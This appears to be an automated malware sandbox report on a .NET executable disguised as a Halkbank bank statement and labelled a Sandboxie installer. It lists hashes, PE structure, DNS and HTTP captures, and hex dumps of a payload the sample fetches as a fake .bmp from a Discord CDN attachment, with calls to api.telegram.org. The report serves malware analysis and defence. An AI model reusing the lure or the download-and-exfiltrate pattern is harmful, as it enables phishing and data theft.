                                                      Entropy (8bit):0.6970840431455908
                                                      Encrypted:false
                                                      SSDEEP:24:TLbJLbXaFpEO5bNmISHn06UwcQPx5fBocLgAZOZD/0:T5LLOpEO5J/Kn7U1uBo8NOZ0
                                                      MD5:00681D89EDDB6AD25E6F4BD2E66C61C6
                                                      SHA1:14B2FBFB460816155190377BBC66AB5D2A15F7AB
                                                      SHA-256:8BF06FD5FAE8199D261EB879E771146AE49600DBDED7FDC4EAC83A8C6A7A5D85
                                                      SHA-512:159A9DE664091A3986042B2BE594E989FD514163094AC606DC3A6A7661A66A78C0D365B8CA2C94B8BC86D552E59D50407B4680EDADB894320125F0E9F48872D3
                                                      Malicious:false
                                                      Preview:SQLite format 3......@ ..........................................................................C....... ..g... .8....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                      File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                      Entropy (8bit):3.6016712532356197
                                                      TrID:
                                                      • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                      • Win32 Executable (generic) a (10002005/4) 49.78%
                                                      • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                      • Generic Win/DOS Executable (2004/3) 0.01%
                                                      • DOS Executable Generic (2002/1) 0.01%
                                                      File name:Halkbank_Ekstre_20220513_082357_541079.exe
                                                      File size:24576
                                                      MD5:bef71f070519aad800bf09d7d5a7659b
                                                      SHA1:2d276da3aefc56f4fa91cfaaf7e766f48f1d6140
                                                      SHA256:969bf771ed84b11bc61cff977691a938687d043ca13b851efa7a627ef58b90b0
                                                      SHA512:f2bec83b6424a09cf2d2143b37674fdea0302d9d9509257ae3948024d36d391ba1e85c6d507e105ffa907721afdc40468fad47b8c30bcc6f3eef0d3411fc99fe
                                                      SSDEEP:192:6F7qKYJTOIFfqdgaa62h/sDSl7H6jQpHR9oGR6H1iS2W/5owhtFhseg0l:6F7qp4sG062VsDSZH6U0GAH1zFRXr
                                                      TLSH:7FB20A15E3E1D231C9EA1AF6ED11619083349E04D9526F5BB44A332F38F324CE89D6E2
                                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....................0......F......z7... ...@....@.. ....................................@................................
                                                      Icon Hash:58585a18a19c068b
                                                      Entrypoint:0x40377a
                                                      Entrypoint Section:.text
                                                      Digitally signed:false
                                                      Imagebase:0x400000
                                                      Subsystem:windows gui
                                                      Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE
                                                      DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                                                      Time Stamp:0x90D0B804 [Fri Dec 28 08:15:00 2046 UTC]
                                                      TLS Callbacks:
                                                      CLR (.Net) Version:v4.0.30319
                                                      OS Version Major:4
                                                      OS Version Minor:0
                                                      File Version Major:4
                                                      File Version Minor:0
                                                      Subsystem Version Major:4
                                                      Subsystem Version Minor:0
                                                      Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                                      Instruction
                                                      jmp dword ptr [00402000h]
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      NameVirtual AddressVirtual Size Is in Section
                                                      IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_IMPORT0x37280x4f.text
                                                      IMAGE_DIRECTORY_ENTRY_RESOURCE0x40000x422c.rsrc
                                                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_BASERELOC0xa0000xc.reloc
                                                      IMAGE_DIRECTORY_ENTRY_DEBUG0x370c0x1c.text
                                                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                      NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                      .text0x20000x17800x1800False0.561686197917data5.52901579867IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                      .rsrc0x40000x422c0x4400False0.223690257353data2.62240294651IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                      .reloc0xa0000xc0x200False0.044921875data0.0815394123432IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                      NameRVASizeTypeLanguageCountry
                                                      RT_ICON0x41400x468GLS_BINARY_LSB_FIRST
                                                      RT_ICON0x45b80x10a8dBase IV DBT of @.DBF, block length 4096, next free block index 40, next free block 0, next used block 0
                                                      RT_ICON0x56700x25a8dBase IV DBT of `.DBF, block length 9216, next free block index 40, next free block 0, next used block 0
                                                      RT_GROUP_ICON0x7c280x30data
                                                      RT_VERSION0x7c680x3c2data
                                                      RT_MANIFEST0x803c0x1eaXML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                                      DLLImport
                                                      mscoree.dll_CorExeMain
                                                      DescriptionData
                                                      Translation0x0000 0x04b0
                                                      LegalCopyrightCopyright 2020-2021 by David Xanatos (xanasoft.com)
                                                      Assembly Version5.53.1.0
                                                      InternalNameIdksgm.exe
                                                      FileVersion5.53.1.0
                                                      CompanyNamesandboxie-plus.com
                                                      LegalTrademarks
                                                      CommentsSandboxie Installer
                                                      ProductNameSandboxie
                                                      ProductVersion5.53.1.0
                                                      FileDescriptionSandboxie Installer
                                                      OriginalFilenameIdksgm.exe
                                                      TimestampSource PortDest PortSource IPDest IP
                                                      May 14, 2022 15:15:59.793407917 CEST49749443192.168.2.3162.159.135.233
                                                      May 14, 2022 15:15:59.793447971 CEST44349749162.159.135.233192.168.2.3
                                                      May 14, 2022 15:15:59.793538094 CEST49749443192.168.2.3162.159.135.233
                                                      May 14, 2022 15:15:59.829083920 CEST49749443192.168.2.3162.159.135.233
                                                      May 14, 2022 15:15:59.829109907 CEST44349749162.159.135.233192.168.2.3
                                                      May 14, 2022 15:15:59.869790077 CEST44349749162.159.135.233192.168.2.3
                                                      May 14, 2022 15:15:59.869913101 CEST49749443192.168.2.3162.159.135.233
                                                      May 14, 2022 15:15:59.874658108 CEST49749443192.168.2.3162.159.135.233
                                                      May 14, 2022 15:15:59.874679089 CEST44349749162.159.135.233192.168.2.3
                                                      May 14, 2022 15:15:59.874922991 CEST44349749162.159.135.233192.168.2.3
                                                      May 14, 2022 15:15:59.935122967 CEST49749443192.168.2.3162.159.135.233
                                                      May 14, 2022 15:16:00.504448891 CEST49749443192.168.2.3162.159.135.233
                                                      May 14, 2022 15:16:00.544504881 CEST44349749162.159.135.233192.168.2.3
                                                      May 14, 2022 15:16:00.547806025 CEST44349749162.159.135.233192.168.2.3
                                                      May 14, 2022 15:16:00.547902107 CEST44349749162.159.135.233192.168.2.3
                                                      May 14, 2022 15:16:00.547981977 CEST49749443192.168.2.3162.159.135.233
                                                      May 14, 2022 15:16:00.548001051 CEST44349749162.159.135.233192.168.2.3
                                                      May 14, 2022 15:16:00.548053980 CEST44349749162.159.135.233192.168.2.3
                                                      May 14, 2022 15:16:00.548100948 CEST44349749162.159.135.233192.168.2.3
                                                      May 14, 2022 15:16:00.548139095 CEST44349749162.159.135.233192.168.2.3
                                                      May 14, 2022 15:16:00.548165083 CEST49749443192.168.2.3162.159.135.233
                                                      May 14, 2022 15:16:00.548176050 CEST44349749162.159.135.233192.168.2.3
                                                      May 14, 2022 15:16:00.548212051 CEST49749443192.168.2.3162.159.135.233
                                                      May 14, 2022 15:16:00.548218012 CEST44349749162.159.135.233192.168.2.3
                                                      May 14, 2022 15:16:00.548269033 CEST49749443192.168.2.3162.159.135.233
                                                      May 14, 2022 15:16:00.548270941 CEST44349749162.159.135.233192.168.2.3
                                                      May 14, 2022 15:16:00.548284054 CEST44349749162.159.135.233192.168.2.3
                                                      May 14, 2022 15:16:00.548336029 CEST49749443192.168.2.3162.159.135.233
                                                      May 14, 2022 15:16:00.548341036 CEST44349749162.159.135.233192.168.2.3
                                                      May 14, 2022 15:16:00.548352957 CEST44349749162.159.135.233192.168.2.3
                                                      May 14, 2022 15:16:00.548412085 CEST49749443192.168.2.3162.159.135.233
                                                      May 14, 2022 15:16:00.548420906 CEST44349749162.159.135.233192.168.2.3
                                                      May 14, 2022 15:16:00.548465967 CEST44349749162.159.135.233192.168.2.3
                                                      May 14, 2022 15:16:00.548511982 CEST49749443192.168.2.3162.159.135.233
                                                      May 14, 2022 15:16:00.548518896 CEST44349749162.159.135.233192.168.2.3
                                                      May 14, 2022 15:16:00.548562050 CEST44349749162.159.135.233192.168.2.3
                                                      May 14, 2022 15:16:00.548602104 CEST44349749162.159.135.233192.168.2.3
                                                      May 14, 2022 15:16:00.548605919 CEST49749443192.168.2.3162.159.135.233
                                                      May 14, 2022 15:16:00.548615932 CEST44349749162.159.135.233192.168.2.3
                                                      May 14, 2022 15:16:00.548661947 CEST49749443192.168.2.3162.159.135.233
                                                      May 14, 2022 15:16:00.548671961 CEST44349749162.159.135.233192.168.2.3
                                                      May 14, 2022 15:16:00.548715115 CEST44349749162.159.135.233192.168.2.3
                                                      May 14, 2022 15:16:00.548753023 CEST44349749162.159.135.233192.168.2.3
                                                      May 14, 2022 15:16:00.548759937 CEST49749443192.168.2.3162.159.135.233
                                                      May 14, 2022 15:16:00.548768997 CEST44349749162.159.135.233192.168.2.3
                                                      May 14, 2022 15:16:00.548810005 CEST49749443192.168.2.3162.159.135.233
                                                      May 14, 2022 15:16:00.548815966 CEST44349749162.159.135.233192.168.2.3
                                                      May 14, 2022 15:16:00.548856020 CEST44349749162.159.135.233192.168.2.3
                                                      May 14, 2022 15:16:00.548896074 CEST44349749162.159.135.233192.168.2.3
                                                      May 14, 2022 15:16:00.548896074 CEST49749443192.168.2.3162.159.135.233
                                                      May 14, 2022 15:16:00.548909903 CEST44349749162.159.135.233192.168.2.3
                                                      May 14, 2022 15:16:00.548952103 CEST49749443192.168.2.3162.159.135.233
                                                      May 14, 2022 15:16:00.548963070 CEST44349749162.159.135.233192.168.2.3
                                                      May 14, 2022 15:16:00.548996925 CEST44349749162.159.135.233192.168.2.3
                                                      May 14, 2022 15:16:00.549031019 CEST44349749162.159.135.233192.168.2.3
                                                      May 14, 2022 15:16:00.549036026 CEST49749443192.168.2.3162.159.135.233
                                                      May 14, 2022 15:16:00.549045086 CEST44349749162.159.135.233192.168.2.3
                                                      May 14, 2022 15:16:00.549084902 CEST49749443192.168.2.3162.159.135.233
                                                      May 14, 2022 15:16:00.549092054 CEST44349749162.159.135.233192.168.2.3
                                                      May 14, 2022 15:16:00.549130917 CEST44349749162.159.135.233192.168.2.3
                                                      May 14, 2022 15:16:00.549166918 CEST44349749162.159.135.233192.168.2.3
                                                      May 14, 2022 15:16:00.549170017 CEST49749443192.168.2.3162.159.135.233
                                                      May 14, 2022 15:16:00.549180984 CEST44349749162.159.135.233192.168.2.3
                                                      May 14, 2022 15:16:00.549222946 CEST49749443192.168.2.3162.159.135.233
                                                      May 14, 2022 15:16:00.549232006 CEST44349749162.159.135.233192.168.2.3
                                                      May 14, 2022 15:16:00.549269915 CEST44349749162.159.135.233192.168.2.3
                                                      May 14, 2022 15:16:00.549305916 CEST44349749162.159.135.233192.168.2.3
                                                      May 14, 2022 15:16:00.549312115 CEST49749443192.168.2.3162.159.135.233
                                                      May 14, 2022 15:16:00.549323082 CEST44349749162.159.135.233192.168.2.3
                                                      May 14, 2022 15:16:00.549364090 CEST49749443192.168.2.3162.159.135.233
                                                      May 14, 2022 15:16:00.549371958 CEST44349749162.159.135.233192.168.2.3
                                                      May 14, 2022 15:16:00.549385071 CEST44349749162.159.135.233192.168.2.3
                                                      May 14, 2022 15:16:00.549439907 CEST49749443192.168.2.3162.159.135.233
                                                      May 14, 2022 15:16:00.549448013 CEST44349749162.159.135.233192.168.2.3
                                                      May 14, 2022 15:16:00.549515963 CEST44349749162.159.135.233192.168.2.3
                                                      May 14, 2022 15:16:00.549570084 CEST49749443192.168.2.3162.159.135.233
                                                      May 14, 2022 15:16:00.549577951 CEST44349749162.159.135.233192.168.2.3
                                                      May 14, 2022 15:16:00.564543962 CEST44349749162.159.135.233192.168.2.3
                                                      May 14, 2022 15:16:00.564670086 CEST49749443192.168.2.3162.159.135.233
                                                      May 14, 2022 15:16:00.564696074 CEST44349749162.159.135.233192.168.2.3
                                                      May 14, 2022 15:16:00.564754009 CEST49749443192.168.2.3162.159.135.233
                                                      May 14, 2022 15:16:00.564817905 CEST44349749162.159.135.233192.168.2.3
                                                      May 14, 2022 15:16:00.564868927 CEST44349749162.159.135.233192.168.2.3
                                                      May 14, 2022 15:16:00.564924955 CEST49749443192.168.2.3162.159.135.233
                                                      May 14, 2022 15:16:00.564934015 CEST44349749162.159.135.233192.168.2.3
                                                      May 14, 2022 15:16:00.564979076 CEST44349749162.159.135.233192.168.2.3
                                                      May 14, 2022 15:16:00.565027952 CEST44349749162.159.135.233192.168.2.3
                                                      May 14, 2022 15:16:00.565043926 CEST49749443192.168.2.3162.159.135.233
                                                      May 14, 2022 15:16:00.565052032 CEST44349749162.159.135.233192.168.2.3
                                                      May 14, 2022 15:16:00.565080881 CEST44349749162.159.135.233192.168.2.3
                                                      May 14, 2022 15:16:00.565092087 CEST49749443192.168.2.3162.159.135.233
                                                      May 14, 2022 15:16:00.565118074 CEST49749443192.168.2.3162.159.135.233
                                                      May 14, 2022 15:16:00.565121889 CEST44349749162.159.135.233192.168.2.3
                                                      May 14, 2022 15:16:00.565145969 CEST44349749162.159.135.233192.168.2.3
                                                      May 14, 2022 15:16:00.565170050 CEST49749443192.168.2.3162.159.135.233
                                                      May 14, 2022 15:16:00.565197945 CEST44349749162.159.135.233192.168.2.3
                                                      May 14, 2022 15:16:00.565228939 CEST49749443192.168.2.3162.159.135.233
                                                      May 14, 2022 15:16:00.565236092 CEST44349749162.159.135.233192.168.2.3
                                                      May 14, 2022 15:16:00.565262079 CEST49749443192.168.2.3162.159.135.233
                                                      May 14, 2022 15:16:00.565311909 CEST44349749162.159.135.233192.168.2.3
                                                      TimestampSource PortDest PortSource IPDest IP
                                                      May 14, 2022 15:15:59.707294941 CEST5772353192.168.2.38.8.8.8
                                                      May 14, 2022 15:15:59.725428104 CEST53577238.8.8.8192.168.2.3
                                                      May 14, 2022 15:16:46.821835995 CEST6445253192.168.2.38.8.8.8
                                                      May 14, 2022 15:16:46.837826014 CEST53644528.8.8.8192.168.2.3
                                                      May 14, 2022 15:16:48.946543932 CEST6314653192.168.2.38.8.8.8
                                                      May 14, 2022 15:16:48.964993954 CEST53631468.8.8.8192.168.2.3
                                                      May 14, 2022 15:17:08.008688927 CEST5281053192.168.2.38.8.8.8
                                                      May 14, 2022 15:17:08.029767036 CEST53528108.8.8.8192.168.2.3
                                                      May 14, 2022 15:17:16.995452881 CEST5077853192.168.2.38.8.8.8
                                                      May 14, 2022 15:17:17.013417006 CEST53507788.8.8.8192.168.2.3
                                                      May 14, 2022 15:17:47.228097916 CEST6481653192.168.2.38.8.8.8
                                                      May 14, 2022 15:17:47.244015932 CEST53648168.8.8.8192.168.2.3
                                                      May 14, 2022 15:17:54.432209969 CEST5381653192.168.2.38.8.8.8
                                                      May 14, 2022 15:17:54.450258017 CEST53538168.8.8.8192.168.2.3
                                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                      May 14, 2022 15:15:59.707294941 CEST192.168.2.38.8.8.80x9dfdStandard query (0)cdn.discordapp.comA (IP address)IN (0x0001)
                                                      May 14, 2022 15:16:46.821835995 CEST192.168.2.38.8.8.80xb1ecStandard query (0)api.telegram.orgA (IP address)IN (0x0001)
                                                      May 14, 2022 15:16:48.946543932 CEST192.168.2.38.8.8.80x20cfStandard query (0)api.telegram.orgA (IP address)IN (0x0001)
                                                      May 14, 2022 15:17:08.008688927 CEST192.168.2.38.8.8.80x9bc2Standard query (0)cdn.discordapp.comA (IP address)IN (0x0001)
                                                      May 14, 2022 15:17:16.995452881 CEST192.168.2.38.8.8.80x2f35Standard query (0)cdn.discordapp.comA (IP address)IN (0x0001)
                                                      May 14, 2022 15:17:47.228097916 CEST192.168.2.38.8.8.80x68b4Standard query (0)api.telegram.orgA (IP address)IN (0x0001)
                                                      May 14, 2022 15:17:54.432209969 CEST192.168.2.38.8.8.80x4586Standard query (0)api.telegram.orgA (IP address)IN (0x0001)
                                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                      May 14, 2022 15:15:59.725428104 CEST8.8.8.8192.168.2.30x9dfdNo error (0)cdn.discordapp.com162.159.135.233A (IP address)IN (0x0001)
                                                      May 14, 2022 15:15:59.725428104 CEST8.8.8.8192.168.2.30x9dfdNo error (0)cdn.discordapp.com162.159.130.233A (IP address)IN (0x0001)
                                                      May 14, 2022 15:15:59.725428104 CEST8.8.8.8192.168.2.30x9dfdNo error (0)cdn.discordapp.com162.159.134.233A (IP address)IN (0x0001)
                                                      May 14, 2022 15:15:59.725428104 CEST8.8.8.8192.168.2.30x9dfdNo error (0)cdn.discordapp.com162.159.133.233A (IP address)IN (0x0001)
                                                      May 14, 2022 15:15:59.725428104 CEST8.8.8.8192.168.2.30x9dfdNo error (0)cdn.discordapp.com162.159.129.233A (IP address)IN (0x0001)
                                                      May 14, 2022 15:16:46.837826014 CEST8.8.8.8192.168.2.30xb1ecNo error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)
                                                      May 14, 2022 15:16:48.964993954 CEST8.8.8.8192.168.2.30x20cfNo error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)
                                                      May 14, 2022 15:17:08.029767036 CEST8.8.8.8192.168.2.30x9bc2No error (0)cdn.discordapp.com162.159.133.233A (IP address)IN (0x0001)
                                                      May 14, 2022 15:17:08.029767036 CEST8.8.8.8192.168.2.30x9bc2No error (0)cdn.discordapp.com162.159.130.233A (IP address)IN (0x0001)
                                                      May 14, 2022 15:17:08.029767036 CEST8.8.8.8192.168.2.30x9bc2No error (0)cdn.discordapp.com162.159.135.233A (IP address)IN (0x0001)
                                                      May 14, 2022 15:17:08.029767036 CEST8.8.8.8192.168.2.30x9bc2No error (0)cdn.discordapp.com162.159.129.233A (IP address)IN (0x0001)
                                                      May 14, 2022 15:17:08.029767036 CEST8.8.8.8192.168.2.30x9bc2No error (0)cdn.discordapp.com162.159.134.233A (IP address)IN (0x0001)
                                                      May 14, 2022 15:17:17.013417006 CEST8.8.8.8192.168.2.30x2f35No error (0)cdn.discordapp.com162.159.133.233A (IP address)IN (0x0001)
                                                      May 14, 2022 15:17:17.013417006 CEST8.8.8.8192.168.2.30x2f35No error (0)cdn.discordapp.com162.159.130.233A (IP address)IN (0x0001)
                                                      May 14, 2022 15:17:17.013417006 CEST8.8.8.8192.168.2.30x2f35No error (0)cdn.discordapp.com162.159.135.233A (IP address)IN (0x0001)
                                                      May 14, 2022 15:17:17.013417006 CEST8.8.8.8192.168.2.30x2f35No error (0)cdn.discordapp.com162.159.129.233A (IP address)IN (0x0001)
                                                      May 14, 2022 15:17:17.013417006 CEST8.8.8.8192.168.2.30x2f35No error (0)cdn.discordapp.com162.159.134.233A (IP address)IN (0x0001)
                                                      May 14, 2022 15:17:47.244015932 CEST8.8.8.8192.168.2.30x68b4No error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)
                                                      May 14, 2022 15:17:54.450258017 CEST8.8.8.8192.168.2.30x4586No error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)
                                                      • cdn.discordapp.com
                                                      • api.telegram.org
                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                      0192.168.2.349749162.159.135.233443C:\Users\user\Desktop\Halkbank_Ekstre_20220513_082357_541079.exe
                                                      TimestampkBytes transferredDirectionData
                                                      2022-05-14 13:16:00 UTC0OUTGET /attachments/968269163632152578/974666441108365352/Idksgm_Umgkodlw.bmp HTTP/1.1
                                                      Host: cdn.discordapp.com
                                                      Connection: Keep-Alive
                                                      2022-05-14 13:16:00 UTC0INHTTP/1.1 200 OK
                                                      Date: Sat, 14 May 2022 13:16:00 GMT
                                                      Content-Type: image/x-ms-bmp
                                                      Content-Length: 416768
                                                      Connection: close
                                                      CF-Ray: 70b3e7e73f62905b-FRA
                                                      Accept-Ranges: bytes
                                                      Age: 82487
                                                      Cache-Control: public, max-age=31536000
                                                      Content-Disposition: attachment;%20filename=Idksgm_Umgkodlw.bmp
                                                      ETag: "c4adc7c987e700a85f16c250fb6e6e03"
                                                      Expires: Sun, 14 May 2023 13:16:00 GMT
                                                      Last-Modified: Fri, 13 May 2022 13:36:28 GMT
                                                      Vary: Accept-Encoding
                                                      CF-Cache-Status: HIT
                                                      Alt-Svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                                                      Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
                                                      x-goog-generation: 1652448988027717
                                                      x-goog-hash: crc32c=TuJfbQ==
                                                      x-goog-hash: md5=xK3HyYfnAKhfFsJQ+25uAw==
                                                      x-goog-metageneration: 1
                                                      x-goog-storage-class: STANDARD
                                                      x-goog-stored-content-encoding: identity
                                                      x-goog-stored-content-length: 416768
                                                      X-GUploader-UploadID: ADPycdscSd6oC8GbGCX6htPZTy8OjzgUlT7J2mqtIVAo3Ipln5m_O6IIVCBEGI5gYDzTygFYU2kqSGfMaBl-8Ag9Tnud6g
                                                      X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=6CiUW2Vs5BaqZYSjHDZesfjJTiDpw0fNzDkyV4fVM7%2B3qFl3ZNBj%2FVvZAhOYP2oolVXEtqRP41zLQu1gjQUyTiY4Jkxb66GrRM4PK%2FR4UeIJVDl1K8EU02mqnU33MVLOWyDmVw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                      2022-05-14 13:16:00 UTC1INData Raw: 4e 45 4c 3a 20 7b 22 73 75 63 63 65 73 73 5f 66 72 61 63 74 69 6f 6e 22 3a 30 2c 22 72 65 70 6f 72 74 5f 74 6f 22 3a 22 63 66 2d 6e 65 6c 22 2c 22 6d 61 78 5f 61 67 65 22 3a 36 30 34 38 30 30 7d 0d 0a 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 0d 0a
                                                      Data Ascii: NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflare
                                                      2022-05-14 13:16:00 UTC1INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                      Data Ascii:
                                                      2022-05-14 13:16:00 UTC2INData Raw: 54 00 00 00 04 00 24 00 00 00 00 00 6f 00 66 00 6e 00 49 00 65 00 6c 00 69 00 46 00 72 00 61 00 56 00 01 00 00 00 44 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 02 00 00 00 04 00 00 00 00 00 00 00 3f 1f e8 74 ab 00 01 00 00 1f e8 74 ab 00 01 00 00 00 01 00 00 fe ef 04 bd 00 00 00 00 00 4f 00 46 00 4e 00 49 00 5f 00 4e 00 4f 00 49 00 53 00 52 00 45 00 56 00 5f 00 53 00 56 00 00 00 34 03 32 00 00 00 00 00 00 03 32 00 06 80 54 00 00 00 48 00 00 00 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 30 00 00 00 01 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 18 00 00 00 10 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                      Data Ascii: T$ofnIeliFraVD?ttOFNI_NOISREV_SV422TH0
                                                      2022-05-14 13:16:00 UTC4INData Raw: 6c be 13 42 f2 ae 1c 63 75 94 51 35 fc f1 fe 92 33 2d 24 73 f7 35 25 cc bb a5 12 94 7c ab de 65 92 42 cb 31 4d 1b 4b 4b a5 0f 3d e9 f9 a2 d9 a0 7d ba bc b8 04 19 2f 22 0d 43 32 0f f7 dc d0 aa 52 e9 d9 69 c1 9b ed 81 5f c3 b8 fe de a1 cc 48 04 2c 05 45 98 01 2d 50 aa 82 b3 49 fd a3 67 43 6a 9e 65 1d 30 92 3c 94 5a 47 1f 9d 9c 17 14 9f a2 96 15 50 71 6d e2 63 22 81 41 a9 1e 49 3f 87 1e 83 e9 c2 c6 0e 43 13 a6 ab 3b 73 24 72 0f 8c dc ff 41 02 69 df ef d4 20 4e e5 77 77 49 3c 4e 51 a9 55 2e f8 2d fd a5 c7 4d 26 6b be 22 8c f8 b7 ac aa c2 0b e8 db 1a 0c 99 9c 2a 90 0f db 56 14 fa 15 eb 76 1b c2 78 1d c2 69 21 e4 ce a8 2e 72 af da 90 bd 6b d9 b9 54 cd e8 fe ba 21 be f7 99 80 59 de dd ae 5d 3a 5f 96 2c f1 2e d2 4a 7b 5c cc d7 b4 1b 58 2d 45 09 1b d2 fe 5d 78 02
